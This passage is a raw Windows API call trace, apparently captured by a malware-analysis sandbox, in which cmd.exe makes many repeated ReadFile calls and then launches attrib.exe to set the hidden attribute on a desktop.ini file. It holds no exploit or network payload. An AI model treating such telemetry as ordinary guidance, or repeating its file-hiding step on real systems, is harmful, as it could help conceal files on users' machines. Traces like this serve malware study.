out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.844] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.844] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.844] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.844] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.867] FindClose (in: hFindFile=0x450820 | out: hFindFile=0x450820) returned 1 [0212.867] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0212.868] _close (_FileHandle=3) returned 0 [0212.868] GetConsoleTitleW (in: lpConsoleTitle=0x2ef400, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.868] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0212.868] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.868] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.868] FindClose (in: hFindFile=0x450820 | out: hFindFile=0x450820) returned 1 [0212.869] FindClose (in: hFindFile=0x450820 | out: hFindFile=0x450820) returned 1 [0212.869] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0212.869] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0212.869] GetConsoleTitleW (in: lpConsoleTitle=0x2ef194, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.869] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef01c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef0e4 | out: lpAttributeList=0x2ef01c, lpSize=0x2ef0e4) returned 1 [0212.869] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef01c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef0dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef01c, lpPreviousValue=0x0) returned 1 [0212.869] GetStartupInfoW (in: lpStartupInfo=0x2eefd8 | out: lpStartupInfo=0x2eefd8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0212.869] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.869] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef078*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef0c4 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" ", lpProcessInformation=0x2ef0c4*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb48, dwThreadId=0x98c)) returned 1 [0212.870] CloseHandle (hObject=0x50) returned 1 [0212.871] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.871] GetEnvironmentStringsW () returned 0x452d20* [0212.871] FreeEnvironmentStringsW (penv=0x452d20) returned 1 [0212.871] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0212.932] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2eefb8 | out: lpExitCode=0x2eefb8*=0x0) returned 1 [0212.932] CloseHandle (hObject=0x4c) returned 1 [0212.932] _vsnwprintf (in: _Buffer=0x2ef100, _BufferCount=0x13, _Format="%08X", _ArgList=0x2eefc4 | out: _Buffer="00000000") returned 8 [0212.932] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0212.932] GetEnvironmentStringsW () returned 0x452d20* [0212.932] FreeEnvironmentStringsW (penv=0x452d20) returned 1 [0212.932] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0212.932] GetEnvironmentStringsW () returned 0x452d20* [0212.932] FreeEnvironmentStringsW (penv=0x452d20) returned 1 [0212.932] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef01c | out: lpAttributeList=0x2ef01c) [0212.932] GetConsoleTitleW (in: lpConsoleTitle=0x2ef400, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.932] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0212.932] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.933] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.933] FindClose (in: hFindFile=0x450820 | out: hFindFile=0x450820) returned 1 [0212.933] FindClose (in: hFindFile=0x450820 | out: hFindFile=0x450820) returned 1 [0212.933] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0212.933] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0212.933] GetConsoleTitleW (in: lpConsoleTitle=0x2ef194, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.934] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef01c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef0e4 | out: lpAttributeList=0x2ef01c, lpSize=0x2ef0e4) returned 1 [0212.934] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef01c, dwFlags=0x0, Attribute=0x60001, 